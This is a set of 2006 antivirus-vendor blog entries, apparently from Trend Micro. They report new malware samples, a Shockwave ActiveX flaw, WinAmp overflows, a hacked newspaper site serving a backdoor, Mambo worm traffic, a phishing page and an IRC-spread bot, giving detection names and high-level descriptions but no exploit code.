Yes, we’re currently in the process of acquiring these samples. What samples? First up, there’s the ‘RedBrowser’ malware. Then there’s this one from mobileav.org, and i quote:

The Mobile Malware Researchers Association (MARA) today announced that it has characterized the first malware to cross-infect a handheld phone or PDA from a binary on the desktop PC. The malware, a Trojan dubbed “crossover”, spreads from a Win32 desktop machine to a Windows Mobile Pocket PC handheld.

Update(JJ, 01 March 2006 08:31:52)

The first one (‘RedBrowser’) will be detected as SYMBOS_REDBROW.A

Shortly after version 5.13, here comes 5.2. Version 5.2 fixes some bugs found after the release of 5.13, which was released when vulnerabilities allowing code execution were discovered in 5.12.

After 5.13 was released, a number of other buffer overflows was discovered. However, of the three different exploits I’ve seen, none of them seem to be exploitable with the attacker gaining control of the program.

When testing the exploits/vulns, all I saw where different buffers being overflowed, but no way to gain control of the program (which is one reason why you didn’t see any blog entries from me about those vulnerabilities).

Well, that’s what I saw in my tests. Mostly just a DOS attack.

Anyway, if you have WinAmp, do update to the latest version.

A vulnerability was found in ShockWave that would allow remote code execution.

The vulnerability details below was taken from Zero Day Initiative

This specific flaw exists within the ActiveX control with CLSID 166B1BCA-3F9C-11CF-8075-444553540000. Specifying large values for two specific parameters to this control results in an exploitable stack based buffer overflow. Due to the nature of this vulnerability, the target user is not required to have fully completed an installation of Shockwave to be vulnerable.

Adobe has already been infrormed and has already fixed the issue with the installer.

The advisory made by Zero Day Initiative can be found here.

We’ve just received reports of a New York online newspaper site being hacked, and is now serving malware (a backdoor) through an old exploit. We’ve visited the site (using a test system of course), and true enough, some pages did contain malicious code in them, being installed using an old exploit (MS04-013).

So, it’s always a good idea to keep ALL systems patched. Not only Windows, or Microsoft products, but ALL systems. And, always keep your antivirus programs updated.

Update(JJ, 27 February 2006 22:53:52)

The malicious files are to be detected as: BKDR_DELF.AQM and CHM_DELF.AVL.

No, they’re not related.

First up: The Mambo Exploit. We still keep receiving packets that attempt to exploit Mambo (and a few XML-RPC exploit attempts as well). And the thing is, even though the exploit code downloads a filename that we saw, say, 2 weeks ago, the same filename now has different codes. Again, this just shows that lots of users still have not patched their Mambo installations. Oh, by the way, the malware in question appears to be a worm (again) that exploits Mambo, as well as XML-RPC.

And, another phishing attempt. This was from a friend of mine:



It’s possible that she was a vicitim of a previous phish. *sigh* I’ll have to contact her to tell her to change her password. By the way, by this time, you should already know how to spot fake URL’s. For this one, if you go the site (but i advise you not to, since I don’t know what other tricks the site has), you will be presented with a Yahoo Games Login. But then, when you look at the URL, it says sexy_photos_hot. Yahoo games? Sexy Photos? No. Also, the REAL yahoo games site is not at geocities (even though Geocities IS a part of Yahoo). It’s at games.yahoo.com.

We received a malware and here are some details.

Remember our previous post on IM worms that chat with the target? Well, here’s a similar instance. Check it out.

Current detection:

FileName : SexyGirl.zip/SexyGirl.scr
TrendMicro : PAK_Generic.001

Based on initial-string-based-analysis, we did not find the strings of the chat in the malware. Taking out the possibility that it is encrypted (for simplicity’s sake), it could mean that the “chatters” (latia, Whyn0tt_87, D115ny_cute) are actual bot-infected-systems which were instructed to propagate the malicious link via IRC. Much like the AOL propagation used by bots. The Botmaster can control the links. Or, the botmasters created legal irc ‘bots’ that park on the channel and sends the messages to the users of the channels. Yes, there are legal irc ‘bots’. Google on irc bots.

Update(JJ, 23 February 2006 00:14:56)

So I decided to delve deeper into this bot, and the botmaster does control the irc messages that it sends out. This is its infection vector, as the bot does not have any commands to exploit other systems automatically. Also, this bot does not join a channel, AND, the server that it joins is a legit channel. The bot master has a script to tell the infected systems to “propagate” the “Sexy Girl” and “Full Sex Movie” links. And still, there are many users who are infected (based on the logs that I took).

Pport 80 malware is quite high, particularly those exploiting the Mambo mosConfig exploit. This exploit is not new. It just means that attackers are still able to succesfully compromise vulnerable machines.

The exploit downloads a shell script, which in turn downloads and executes other malware including the actual worm that does the exploiting (it also has a module for exploiting the XML-RPC vulnerability), as well as an IRC client (yes, to take part in an eveeel-botnet server).

What malwares are these you say? Check out our Virus Encyclopedia for the following malwares:

• ELF_LUPPER
  
• PERL_SHELLBOT
  
• ELF_KAITEN
  
• ELF_MARE

And if I missed something, you can always check our Advisories page for the latest malwares from our honeypots.

After OSX_LEAP.A, here comes another malware-poc for OSX: OSX_INQTANA.A.

I leave the link-clicking-read-the-details to you.

A couple of days after Microsoft released their monthly security patch, proof-of-concept (PoC) code was posted by FrSIRT targeting MS06-005 vulnerability. (Check our previous blog entry here.)

Another version of the exploit code was released and posted by FrSIRT for MS06-005: Vulnerability in Windows Media Player Could Allow Remote Code Execution.

On the other hand, a proof of concept on MS06-009: Vulnerability in the Korean Input Method Editor Could Allow Elevation of Privilege [ShellAbout() API Elevation of Privilege] was posted by the Securiteam. (This one’s really easy to do) :)

Visit the following link for Trend Micro’s information on Microsoft’s February Security patch.

• http://www.trendmicro.com/vinfo/default.asp?sect=SA